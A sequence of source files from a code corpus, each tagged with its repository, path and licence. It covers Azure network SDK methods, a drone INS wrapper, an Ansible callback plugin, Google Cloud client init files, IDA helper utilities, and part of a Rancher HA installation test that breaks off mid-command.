self.get.metadata['url'] # type: ignore path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'), 'peeringName': self._serialize.url("peering_name", peering_name, 'str'), 'connectionName': self._serialize.url("connection_name", connection_name, 'str'), 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize('PeerExpressRouteCircuitConnection', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections/{connectionName}'} # type: ignore def list( self, resource_group_name: str, circuit_name: str, peering_name: str, **kwargs ) -> AsyncIterable["_models.PeerExpressRouteCircuitConnectionListResult"]: """Gets all global reach peer connections associated with a private peering in an express route circuit. :param resource_group_name: The name of the resource group. :type resource_group_name: str :param circuit_name: The name of the circuit. :type circuit_name: str :param peering_name: The name of the peering. :type peering_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either PeerExpressRouteCircuitConnectionListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.PeerExpressRouteCircuitConnectionListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnectionListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) api_version = "2020-06-01" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list.metadata['url'] # type: ignore path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'), 'peeringName': self._serialize.url("peering_name", peering_name, 'str'), 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('PeerExpressRouteCircuitConnectionListResult', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections'} # type: ignore
mit
PTDreamer/dRonin
python/ins/cins.py
11
3838
from sympy import symbols, lambdify, sqrt from sympy import MatrixSymbol, Matrix from numpy import cos, sin, power from sympy.matrices import * from quaternions import * import numpy import ins # this is the set of (currently) recommend INS settings. modified from # https://raw.githubusercontent.com/wiki/TauLabs/TauLabs/files/htfpv-sparky-nav_20130527.uav default_mag_var = numpy.array([10.0, 10.0, 100.0]) default_gyro_var = numpy.array([1e-5, 1e-5, 1e-4]) default_accel_var = numpy.array([0.01, 0.01, 0.01]) default_baro_var = 0.1 default_gps_var=numpy.array([1e-3,1e-2,10]) class CINS: GRAV = 9.805 def __init__(self): """ Creates the CINS class. Important variables are * X - the vector of state variables * Xd - the vector of state derivatives for state and inputs * Y - the vector of outputs for current state value """ self.state = [] def configure(self, mag_var=None, gyro_var=None, accel_var=None, baro_var=None, gps_var=None): """ configure the INS parameters """ if mag_var is not None: ins.configure(mag_var=mag_var) if gyro_var is not None: ins.configure(gyro_var=gyro_var) if accel_var is not None: ins.configure(accel_var=accel_var) if baro_var is not None: ins.configure(baro_var=baro_var) if gps_var is not None: ins.configure(gps_var=gps_var) def prepare(self): """ prepare the C INS wrapper """ self.state = ins.init() self.configure( mag_var=default_mag_var, gyro_var=default_gyro_var, accel_var=default_accel_var, baro_var=default_baro_var, gps_var=default_gps_var ) def predict(self, gyros, accels, dT = 1.0/666.0): """ Perform the prediction step """ self.state = ins.prediction(gyros, accels, dT) def correction(self, pos=None, vel=None, mag=None, baro=None): """ Perform the INS correction based on the provided corrections """ sensors = 0 Z = numpy.zeros((10,),numpy.float64) # the masks must match the values in insgps.h if pos is not None: sensors = sensors | 0x0003 Z[0] = pos[0] Z[1] = pos[1] if vel is not None: sensors = sensors | 0x0038 Z[3] = vel[0] Z[4] = vel[1] Z[5] = vel[2] if mag is not None: sensors = sensors | 0x01C0 Z[6] = mag[0] Z[7] = mag[1] Z[8] = mag[2] if baro is not None: sensors = sensors | 0x0200 Z[9] = baro self.state = ins.correction(Z, sensors) def test(): """ test the INS with simulated data """ from numpy import cos, sin import matplotlib.pyplot as plt fig, ax = plt.subplots(2,2) sim = PyINS() sim.prepare() dT = 1.0 / 666.0 STEPS = 100000 history = numpy.zeros((STEPS,16)) history_rpy = numpy.zeros((STEPS,3)) times = numpy.zeros((STEPS,1)) for k in range(STEPS): ROLL = 0.1 YAW = 0.2 sim.predict(U=[0,0,YAW, 0, PyINS.GRAV*sin(ROLL), -PyINS.GRAV*cos(ROLL) - 0.0], dT=dT) history[k,:] = sim.state history_rpy[k,:] = quat_rpy(sim.state[6:10]) times[k] = k * dT angle = 0*numpy.pi/3 + YAW * dT * k # radians height = 1.0 * k * dT if True and k % 60 == 59: sim.correction(pos=[[10],[5],[-height]]) if True and k % 60 == 59: sim.correction(vel=[[0],[0],[-1]]) if k % 20 == 8: sim.correction(baro=[height]) if True and k % 20 == 15: sim.correction(mag=[[400 * cos(angle)], [-400 * sin(angle)], [1600]]) if k % 1000 == 0: ax[0][0].cla() ax[0][0].plot(times[0:k:4],history[0:k:4,0:3]) ax[0][0].set_title('Position') ax[0][1].cla() ax[0][1].plot(times[0:k:4],history[0:k:4,3:6]) ax[0][1].set_title('Velocity') plt.sca(ax[0][1]) plt.ylim(-2,2) ax[1][0].cla() ax[1][0].plot(times[0:k:4],history_rpy[0:k:4,:]) ax[1][0].set_title('Attitude') ax[1][1].cla() ax[1][1].plot(times[0:k:4],history[0:k:4,10:]) ax[1][1].set_title('Biases') plt.draw() fig.show() plt.show() if __name__ =='__main__': test()
gpl-3.0
jnerin/ansible
lib/ansible/plugins/callback/stderr.py
59
3194
# (c) 2017, Frederic Van Espen <github@freh.be> # (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = ''' callback: stderr callback_type: stdout requirements: - set as main display callback short_description: Splits output, sending failed tasks to stderr version_added: "2.4" extends_documentation_fragment: - default_callback description: - This is the stderr callback plugin, it behaves like the default callback plugin but sends error output to stderr. - Also it does not output skipped host/task/item status ''' from ansible import constants as C from ansible.plugins.callback.default import CallbackModule as CallbackModule_default class CallbackModule(CallbackModule_default): ''' This is the stderr callback plugin, which reuses the default callback plugin but sends error output to stderr. ''' CALLBACK_VERSION = 2.0 CALLBACK_TYPE = 'stdout' CALLBACK_NAME = 'stderr' def __init__(self): self.super_ref = super(CallbackModule, self) self.super_ref.__init__() def v2_runner_on_failed(self, result, ignore_errors=False): delegated_vars = result._result.get('_ansible_delegated_vars', None) self._clean_results(result._result, result._task.action) if self._play.strategy == 'free' and self._last_task_banner != result._task._uuid: self._print_task_banner(result._task) self._handle_exception(result._result, errors_to_stderr=True) self._handle_warnings(result._result) if result._task.loop and 'results' in result._result: self._process_items(result) else: if delegated_vars: self._display.display("fatal: [%s -> %s]: FAILED! => %s" % (result._host.get_name(), delegated_vars['ansible_host'], self._dump_results(result._result)), color=C.COLOR_ERROR, stderr=True) else: self._display.display("fatal: [%s]: FAILED! => %s" % (result._host.get_name(), self._dump_results(result._result)), color=C.COLOR_ERROR, stderr=True) if ignore_errors: self._display.display("...ignoring", color=C.COLOR_SKIP) def _handle_exception(self, result, errors_to_stderr=False): if 'exception' in result: msg = "An exception occurred during task execution. " if self._display.verbosity < 3: # extract just the actual error message from the exception text error = result['exception'].strip().split('\n')[-1] msg += "To see the full traceback, use -vvv. The error was: %s" % error else: msg = "The full traceback is:\n" + result['exception'] del result['exception'] self._display.display(msg, color=C.COLOR_ERROR, stderr=errors_to_stderr)
gpl-3.0
googleapis/googleapis-gen
google/cloud/aiplatform/v1beta1/aiplatform-v1beta1-py/google/cloud/aiplatform_v1beta1/services/vizier_service/transports/__init__.py
1
1185
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from typing import Dict, Type from .base import VizierServiceTransport from .grpc import VizierServiceGrpcTransport from .grpc_asyncio import VizierServiceGrpcAsyncIOTransport # Compile a registry of transports. _transport_registry = OrderedDict() # type: Dict[str, Type[VizierServiceTransport]] _transport_registry['grpc'] = VizierServiceGrpcTransport _transport_registry['grpc_asyncio'] = VizierServiceGrpcAsyncIOTransport __all__ = ( 'VizierServiceTransport', 'VizierServiceGrpcTransport', 'VizierServiceGrpcAsyncIOTransport', )
apache-2.0
googleapis/googleapis-gen
google/cloud/translate/v3beta1/translation-v3beta1-py/google/cloud/translate/__init__.py
1
5300
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from google.cloud.translate_v3beta1.services.translation_service.client import TranslationServiceClient from google.cloud.translate_v3beta1.services.translation_service.async_client import TranslationServiceAsyncClient from google.cloud.translate_v3beta1.types.translation_service import BatchDocumentInputConfig from google.cloud.translate_v3beta1.types.translation_service import BatchDocumentOutputConfig from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateDocumentMetadata from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateDocumentRequest from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateDocumentResponse from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateMetadata from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateResponse from google.cloud.translate_v3beta1.types.translation_service import BatchTranslateTextRequest from google.cloud.translate_v3beta1.types.translation_service import CreateGlossaryMetadata from google.cloud.translate_v3beta1.types.translation_service import CreateGlossaryRequest from google.cloud.translate_v3beta1.types.translation_service import DeleteGlossaryMetadata from google.cloud.translate_v3beta1.types.translation_service import DeleteGlossaryRequest from google.cloud.translate_v3beta1.types.translation_service import DeleteGlossaryResponse from google.cloud.translate_v3beta1.types.translation_service import DetectedLanguage from google.cloud.translate_v3beta1.types.translation_service import DetectLanguageRequest from google.cloud.translate_v3beta1.types.translation_service import DetectLanguageResponse from google.cloud.translate_v3beta1.types.translation_service import DocumentInputConfig from google.cloud.translate_v3beta1.types.translation_service import DocumentOutputConfig from google.cloud.translate_v3beta1.types.translation_service import DocumentTranslation from google.cloud.translate_v3beta1.types.translation_service import GcsDestination from google.cloud.translate_v3beta1.types.translation_service import GcsSource from google.cloud.translate_v3beta1.types.translation_service import GetGlossaryRequest from google.cloud.translate_v3beta1.types.translation_service import GetSupportedLanguagesRequest from google.cloud.translate_v3beta1.types.translation_service import Glossary from google.cloud.translate_v3beta1.types.translation_service import GlossaryInputConfig from google.cloud.translate_v3beta1.types.translation_service import InputConfig from google.cloud.translate_v3beta1.types.translation_service import ListGlossariesRequest from google.cloud.translate_v3beta1.types.translation_service import ListGlossariesResponse from google.cloud.translate_v3beta1.types.translation_service import OutputConfig from google.cloud.translate_v3beta1.types.translation_service import SupportedLanguage from google.cloud.translate_v3beta1.types.translation_service import SupportedLanguages from google.cloud.translate_v3beta1.types.translation_service import TranslateDocumentRequest from google.cloud.translate_v3beta1.types.translation_service import TranslateDocumentResponse from google.cloud.translate_v3beta1.types.translation_service import TranslateTextGlossaryConfig from google.cloud.translate_v3beta1.types.translation_service import TranslateTextRequest from google.cloud.translate_v3beta1.types.translation_service import TranslateTextResponse from google.cloud.translate_v3beta1.types.translation_service import Translation __all__ = ('TranslationServiceClient', 'TranslationServiceAsyncClient', 'BatchDocumentInputConfig', 'BatchDocumentOutputConfig', 'BatchTranslateDocumentMetadata', 'BatchTranslateDocumentRequest', 'BatchTranslateDocumentResponse', 'BatchTranslateMetadata', 'BatchTranslateResponse', 'BatchTranslateTextRequest', 'CreateGlossaryMetadata', 'CreateGlossaryRequest', 'DeleteGlossaryMetadata', 'DeleteGlossaryRequest', 'DeleteGlossaryResponse', 'DetectedLanguage', 'DetectLanguageRequest', 'DetectLanguageResponse', 'DocumentInputConfig', 'DocumentOutputConfig', 'DocumentTranslation', 'GcsDestination', 'GcsSource', 'GetGlossaryRequest', 'GetSupportedLanguagesRequest', 'Glossary', 'GlossaryInputConfig', 'InputConfig', 'ListGlossariesRequest', 'ListGlossariesResponse', 'OutputConfig', 'SupportedLanguage', 'SupportedLanguages', 'TranslateDocumentRequest', 'TranslateDocumentResponse', 'TranslateTextGlossaryConfig', 'TranslateTextRequest', 'TranslateTextResponse', 'Translation', )
apache-2.0
OfficialMan/Sark
sark/core.py
3
4468
import idaapi import idc import string from . import exceptions def get_func(func_ea): """get_func(func_t or ea) -> func_t Take an IDA function (``idaapi.func_t``) or an address (EA) and return an IDA function object. Use this when APIs can take either a function or an address. Args: func_ea: ``idaapi.func_t`` or ea of the function. Returns: An ``idaapi.func_t`` object for the given address. If a ``func_t`` is provided, it is returned. """ if isinstance(func_ea, idaapi.func_t): return func_ea func = idaapi.get_func(func_ea) if func is None: raise exceptions.SarkNoFunction("No function at 0x{:08X}".format(func_ea)) return func def get_ea(func_ea): """get_ea(func_t or ea) -> ea Same as `get_func`, but returns the EA. Args: func_ea: `idaapi.func_t` or EA. Returns: The ea. """ if isinstance(func_ea, idaapi.func_t): return func_ea.startEA return func_ea def is_string_printable(string_): """Check if a string is printable""" return set(string_) - set(string.printable) def string_to_query(string_): if is_string_printable(string_): return '"{}"'.format(string_) return " ".join(char.encode("hex") for char in string_) def iter_find_string(query, start=None, end=None, down=True): query = string_to_query(query) return iter_find_query(query, start, end, down) def iter_find_query(query, start=None, end=None, down=True): start, end = fix_addresses(start, end) if down: direction = idc.SEARCH_DOWN else: direction = idc.SEARCH_UP current = idc.FindBinary(start, direction, query) while current < end: yield current current = idc.FindBinary(current + 1, direction, query) def fix_addresses(start=None, end=None): """Set missing addresses to start and end of IDB. Take a start and end addresses. If an address is None or `BADADDR`, return start or end addresses of the IDB instead. Args start: Start EA. Use `None` to get IDB start. end: End EA. Use `None` to get IDB end. Returns: (start, end) """ if start in (None, idaapi.BADADDR): start = idaapi.cvar.inf.minEA if end in (None, idaapi.BADADDR): end = idaapi.cvar.inf.maxEA return start, end def set_name(address, name, anyway=False): """Set the name of an address. Sets the name of an address in IDA. If the name already exists, check the `anyway` parameter: True - Add `_COUNTER` to the name (default IDA behaviour) False - Raise an `exceptions.SarkErrorNameAlreadyExists` exception. Args address: The address to rename. name: The desired name. anyway: Set anyway or not. Defualt ``False``. """ success = idaapi.set_name(address, name, idaapi.SN_NOWARN | idaapi.SN_NOCHECK) if success: return if anyway: success = idaapi.do_name_anyway(address, name) if success: return raise exceptions.SarkSetNameFailed("Failed renaming 0x{:08X} to {!r}.".format(address, name)) raise exceptions.SarkErrorNameAlreadyExists( "Can't rename 0x{:08X}. Name {!r} already exists.".format(address, name)) def is_same_function(ea1, ea2): """Are both addresses in the same function?""" func1 = idaapi.get_func(ea1) func2 = idaapi.get_func(ea2) # This is bloated code. `None in (func1, func2)` will not work because of a # bug in IDAPython in the way functions are compared. if any(func is None for func in (func1, func2)): return False return func1.startEA == func2.startEA def get_name_or_address(ea): name = idc.Name(ea) if name: name = repr(name) else: name = "0x{:08X}".format(ea) return name def get_native_size(): """Get the native word size in normal 8-bit bytes.""" info = idaapi.get_inf_structure() if info.is_32bit(): return 4 elif info.is_64bit(): return 8 else: return 2 def get_fileregion_offset(ea): file_offset = idaapi.get_fileregion_offset(ea) if file_offset == -1: raise exceptions.NoFileOffset("Address 0x{:08X} is not mapped to any file offset.".format(ea)) return file_offset def is_function(ea): try: get_func(ea) return True except exceptions.SarkNoFunction: return False
mit
rancher/rancher
tests/validation/tests/v3_api/test_create_ha.py
2
20647
from python_terraform import * # NOQA from .common import * # NOQA from .test_boto_create_eks import get_eks_kubeconfig from .test_import_k3s_cluster import create_multiple_control_cluster from .test_rke_cluster_provisioning import rke_config # RANCHER_HA_KUBECONFIG and RANCHER_HA_HOSTNAME are provided # when installing Rancher into a k3s setup RANCHER_HA_KUBECONFIG = os.environ.get("RANCHER_HA_KUBECONFIG") RANCHER_HA_HOSTNAME = os.environ.get( "RANCHER_HA_HOSTNAME", RANCHER_HOSTNAME_PREFIX + ".qa.rancher.space") resource_prefix = RANCHER_HA_HOSTNAME.split(".qa.rancher.space")[0] RANCHER_SERVER_URL = "https://" + RANCHER_HA_HOSTNAME RANCHER_CHART_VERSION = os.environ.get("RANCHER_CHART_VERSION") RANCHER_HELM_EXTRA_SETTINGS = os.environ.get("RANCHER_HELM_EXTRA_SETTINGS") RANCHER_IMAGE_TAG = os.environ.get("RANCHER_IMAGE_TAG") RANCHER_HELM_REPO = os.environ.get("RANCHER_HELM_REPO", "latest") RANCHER_LETSENCRYPT_EMAIL = os.environ.get("RANCHER_LETSENCRYPT_EMAIL") # Here is the list of cert types for HA install # [rancher-self-signed, byo-valid, byo-self-signed, letsencrypt] RANCHER_HA_CERT_OPTION = os.environ.get("RANCHER_HA_CERT_OPTION", "rancher-self-signed") RANCHER_VALID_TLS_CERT = os.environ.get("RANCHER_VALID_TLS_CERT") RANCHER_VALID_TLS_KEY = os.environ.get("RANCHER_VALID_TLS_KEY") RANCHER_BYO_TLS_CERT = os.environ.get("RANCHER_BYO_TLS_CERT") RANCHER_BYO_TLS_KEY = os.environ.get("RANCHER_BYO_TLS_KEY") RANCHER_PRIVATE_CA_CERT = os.environ.get("RANCHER_PRIVATE_CA_CERT") RANCHER_LOCAL_CLUSTER_TYPE = os.environ.get("RANCHER_LOCAL_CLUSTER_TYPE") RANCHER_ADD_CUSTOM_CLUSTER = os.environ.get("RANCHER_ADD_CUSTOM_CLUSTER", "True") KUBERNETES_VERSION = os.environ.get("RANCHER_LOCAL_KUBERNETES_VERSION","") RANCHER_K3S_VERSION = os.environ.get("RANCHER_K3S_VERSION", "") kubeconfig_path = DATA_SUBDIR + "/kube_config_cluster-ha-filled.yml" export_cmd = "export KUBECONFIG=" + kubeconfig_path def test_remove_rancher_ha(): assert CATTLE_TEST_URL.endswith(".qa.rancher.space"), \ "the CATTLE_TEST_URL need to end with .qa.rancher.space" if not check_if_ok(CATTLE_TEST_URL): print("skip deleting clusters within the setup") else: print("the CATTLE_TEST_URL is accessible") admin_token = get_user_token("admin", ADMIN_PASSWORD) client = get_client_for_token(admin_token) # delete clusters except the local cluster clusters = client.list_cluster(id_ne="local").data print("deleting the following clusters: {}" .format([cluster.name for cluster in clusters])) for cluster in clusters: print("deleting the following cluster : {}".format(cluster.name)) delete_cluster(client, cluster) resource_prefix = \ CATTLE_TEST_URL.split(".qa.rancher.space")[0].split("//")[1] delete_resource_in_AWS_by_prefix(resource_prefix) def test_install_rancher_ha(precheck_certificate_options): cm_install = True extra_settings = [] if "byo-" in RANCHER_HA_CERT_OPTION: cm_install = False print("The hostname is: {}".format(RANCHER_HA_HOSTNAME)) # prepare an RKE cluster and other resources # if no kubeconfig file is provided if RANCHER_HA_KUBECONFIG is None: if RANCHER_LOCAL_CLUSTER_TYPE == "RKE": print("RKE cluster is provisioning for the local cluster") nodes = create_resources() config_path = create_rke_cluster_config(nodes) create_rke_cluster(config_path) elif RANCHER_LOCAL_CLUSTER_TYPE == "K3S": print("K3S cluster is provisioning for the local cluster") k3s_kubeconfig_path = \ create_multiple_control_cluster() cmd = "cp {0} {1}".format(k3s_kubeconfig_path, kubeconfig_path) run_command_with_stderr(cmd) elif RANCHER_LOCAL_CLUSTER_TYPE == "EKS": create_resources_eks() eks_kubeconfig_path = get_eks_kubeconfig(resource_prefix + "-ekscluster") cmd = "cp {0} {1}".format(eks_kubeconfig_path, kubeconfig_path) run_command_with_stderr(cmd) install_eks_ingress() extra_settings.append( "--set ingress." "extraAnnotations.\"kubernetes\\.io/ingress\\.class\"=nginx" ) elif RANCHER_LOCAL_CLUSTER_TYPE == "AKS": create_aks_cluster() install_aks_ingress() extra_settings.append( "--set ingress." "extraAnnotations.\"kubernetes\\.io/ingress\\.class\"=nginx" ) else: write_kubeconfig() # wait until the cluster is ready def valid_response(): output = run_command_with_stderr(export_cmd + " && kubectl get nodes") return "Ready" in output.decode() try: wait_for(valid_response) except Exception as e: print("Error: {0}".format(e)) assert False, "check the logs in console for details" print_kubeconfig() if cm_install: install_cert_manager() add_repo_create_namespace() # Here we use helm to install the Rancher chart install_rancher(extra_settings=extra_settings) if RANCHER_LOCAL_CLUSTER_TYPE == "EKS": # For EKS we need to wait for EKS to generate the nlb and then configure # a Route53 record with the ingress address value set_route53_with_eks_ingress() if RANCHER_LOCAL_CLUSTER_TYPE == "AKS": set_route53_with_aks_ingress() wait_for_status_code(url=RANCHER_SERVER_URL + "/v3", expected_code=401) auth_url = \ RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login" wait_for_status_code(url=auth_url, expected_code=200) admin_client = set_url_and_password(RANCHER_SERVER_URL) cluster = get_cluster_by_name(admin_client, "local") validate_cluster_state(admin_client, cluster, False) if RANCHER_ADD_CUSTOM_CLUSTER.upper() == "TRUE": print("creating an custom cluster") create_custom_cluster(admin_client) def create_custom_cluster(admin_client): auth_url = RANCHER_SERVER_URL + \ "/v3-public/localproviders/local?action=login" wait_for_status_code(url=auth_url, expected_code=200) user, user_token = create_user(admin_client, auth_url) aws_nodes = \ AmazonWebServices().create_multiple_nodes( 5, random_test_name(resource_prefix + "-custom")) node_roles = [["controlplane"], ["etcd"], ["worker"], ["worker"], ["worker"]] client = rancher.Client(url=RANCHER_SERVER_URL + "/v3", token=user_token, verify=False) cluster = client.create_cluster( name=random_name(), driver="rancherKubernetesEngine", rancherKubernetesEngineConfig=rke_config) assert cluster.state == "provisioning" i = 0 for aws_node in aws_nodes: docker_run_cmd = \ get_custom_host_registration_cmd( client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 validate_cluster(client, cluster, userToken=user_token) def test_upgrade_rancher_ha(precheck_upgrade_options): write_kubeconfig() add_repo_create_namespace() install_rancher(upgrade=True) def create_resources_eks(): cluster_name = resource_prefix + "-ekscluster" AmazonWebServices().create_eks_cluster(cluster_name) AmazonWebServices().wait_for_eks_cluster_state(cluster_name, "ACTIVE") def create_resources(): # Create nlb and grab ARN & dns name lb = AmazonWebServices().create_network_lb(name=resource_prefix + "-nlb") lbArn = lb["LoadBalancers"][0]["LoadBalancerArn"] lbDns = lb["LoadBalancers"][0]["DNSName"] # Upsert the route53 record -- if it exists, update, if not, insert AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, lbDns) # Create the target groups tg80 = AmazonWebServices(). \ create_ha_target_group(80, resource_prefix + "-tg-80") tg443 = AmazonWebServices(). \ create_ha_target_group(443, resource_prefix + "-tg-443") tg80Arn = tg80["TargetGroups"][0]["TargetGroupArn"] tg443Arn = tg443["TargetGroups"][0]["TargetGroupArn"] # Create listeners for the load balancer, to forward to the target groups AmazonWebServices().create_ha_nlb_listener(loadBalancerARN=lbArn, port=80, targetGroupARN=tg80Arn) AmazonWebServices().create_ha_nlb_listener(loadBalancerARN=lbArn, port=443, targetGroupARN=tg443Arn) targets = [] aws_nodes = AmazonWebServices().\ create_multiple_nodes(3, resource_prefix + "-server") assert len(aws_nodes) == 3 for aws_node in aws_nodes: print(aws_node.public_ip_address) targets.append(aws_node.provider_node_id) # Register the nodes to the target groups targets_list = [dict(Id=target_id, Port=80) for target_id in targets] AmazonWebServices().register_targets(targets_list, tg80Arn) targets_list = [dict(Id=target_id, Port=443) for target_id in targets] AmazonWebServices().register_targets(targets_list, tg443Arn) return aws_nodes def install_cert_manager(): manifests = "https://github.com/jetstack/cert-manager/releases/download/" \ "{0}/cert-manager.crds.yaml".format(CERT_MANAGER_VERSION) cm_repo = "https://charts.jetstack.io" run_command_with_stderr(export_cmd + " && kubectl apply -f " + manifests) run_command_with_stderr("helm_v3 repo add jetstack " + cm_repo) run_command_with_stderr("helm_v3 repo update") run_command_with_stderr(export_cmd + " && " + "kubectl create namespace cert-manager") run_command_with_stderr(export_cmd + " && " + "helm_v3 install cert-manager " "jetstack/cert-manager " "--namespace cert-manager " "--version {0}".format(CERT_MANAGER_VERSION)) time.sleep(120) def install_eks_ingress(): run_command_with_stderr(export_cmd + " && kubectl apply -f " + DATA_SUBDIR + "/eks_nlb.yml") def set_route53_with_eks_ingress(): kubectl_ingress = "kubectl get ingress -n cattle-system -o " \ "jsonpath=\"" \ "{.items[0].status.loadBalancer.ingress[0].hostname}\"" ingress_address = run_command_with_stderr(export_cmd + " && " + kubectl_ingress).decode() AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, ingress_address) time.sleep(60) def set_route53_with_aks_ingress(): kubectl_ingress = "kubectl get svc -n ingress-nginx " \ "ingress-nginx-controller -o " \ "jsonpath=\"" \ "{.status.loadBalancer.ingress[0].ip}\"" time.sleep(10) ingress_address = run_command_with_stderr(export_cmd + " && " + kubectl_ingress).decode() print("AKS INGRESS ADDRESS:") print(ingress_address) AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, ingress_address, record_type='A') time.sleep(60) def add_repo_create_namespace(repo=RANCHER_HELM_REPO): repo_name = "rancher-" + repo repo_url = "https://releases.rancher.com/server-charts/" + repo run_command_with_stderr("helm_v3 repo add " + repo_name + " " + repo_url) run_command_with_stderr("helm_v3 repo update") run_command_with_stderr(export_cmd + " && " + "kubectl create namespace cattle-system") def install_rancher(type=RANCHER_HA_CERT_OPTION, repo=RANCHER_HELM_REPO, upgrade=False, extra_settings=None): operation = "install" if upgrade: operation = "upgrade" helm_rancher_cmd = \ export_cmd + " && helm_v3 " + operation + " rancher " + \ "rancher-" + repo + "/rancher " + \ "--version " + RANCHER_CHART_VERSION + " " + \ "--namespace cattle-system " + \ "--set hostname=" + RANCHER_HA_HOSTNAME if type == 'letsencrypt': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=letsEncrypt " + \ "--set letsEncrypt.email=" + \ RANCHER_LETSENCRYPT_EMAIL elif type == 'byo-self-signed': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=secret " + \ "--set privateCA=true" elif type == 'byo-valid': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=secret" if RANCHER_IMAGE_TAG != "" and RANCHER_IMAGE_TAG is not None: helm_rancher_cmd = \ helm_rancher_cmd + \ " --set rancherImageTag=" + RANCHER_IMAGE_TAG if operation == "install": if type == "byo-self-signed": create_tls_secrets(valid_cert=False) elif type == "byo-valid": create_tls_secrets(valid_cert=True) if RANCHER_HELM_EXTRA_SETTINGS: extra_settings.append(RANCHER_HELM_EXTRA_SETTINGS) if extra_settings: for setting in extra_settings: helm_rancher_cmd = helm_rancher_cmd + " " + setting run_command_with_stderr(helm_rancher_cmd) time.sleep(120) # set trace logging set_trace_cmd = "kubectl -n cattle-system get pods -l app=rancher " + \ "--no-headers -o custom-columns=name:.metadata.name | " + \ "while read rancherpod; do kubectl -n cattle-system " + \ "exec $rancherpod -c rancher -- loglevel --set trace; done" run_command_with_stderr(set_trace_cmd) def create_tls_secrets(valid_cert): cert_path = DATA_SUBDIR + "/tls.crt" key_path = DATA_SUBDIR + "/tls.key" ca_path = DATA_SUBDIR + "/cacerts.pem" if valid_cert: # write files from env var write_encoded_certs(cert_path, RANCHER_VALID_TLS_CERT) write_encoded_certs(key_path, RANCHER_VALID_TLS_KEY) else: write_encoded_certs(cert_path, RANCHER_BYO_TLS_CERT) write_encoded_certs(key_path, RANCHER_BYO_TLS_KEY) write_encoded_certs(ca_path, RANCHER_PRIVATE_CA_CERT) tls_command = export_cmd + " && kubectl -n cattle-system " \ "create secret tls 